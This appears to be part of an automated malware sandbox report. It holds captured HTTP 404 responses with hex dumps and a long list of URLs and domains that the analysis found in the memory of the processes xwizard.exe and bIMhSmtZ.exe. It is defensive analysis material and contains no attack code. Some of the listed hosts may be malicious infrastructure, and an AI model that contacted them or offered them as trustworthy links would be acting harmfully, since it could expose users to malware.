                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:43:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:43:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:43:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:43:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:43:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Fri, 07 Mar 2025 22:43:40 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Fri, 07 Mar 2025 22:43:42 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Fri, 07 Mar 2025 22:43:45 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Fri, 07 Mar 2025 22:43:48 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: xwizard.exe, 00000009.00000002.3090636094.0000000006908000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.0000000004288000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=fsp.financial&pid=9PO755G95
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aicaozhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aikezhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.anmozhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.antuzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.apsia.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.astrogeo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.athousandwords.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.automester.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.babygirlnames.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.baofengzhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.baoyuezhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.beautifullady.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=984371217297
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.beibizhibo.com
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bemoneysmart.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.billnelson.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.biswapnft.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.brieftherapy.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.carlosramirez.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cellnutrition.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chawangzhibo.net
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/oi3c/
                Source: xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3
                Source: xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/bl.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/broadcast.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/index.umd.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/js.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/nc.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/pullup.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/realNameAuth.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png
                Source: bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.choujiezhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.chouyinzhibo.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cryptico.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cyberpolice.cn
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.defibiswap.net
                Source: xwizard.exe, 00000009.00000002.3092294349.0000000007E80000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000009.00000002.3090636094.0000000005F9C000.00000004.10000000.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000002.3090251513.000000000391C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.dentalpros.net
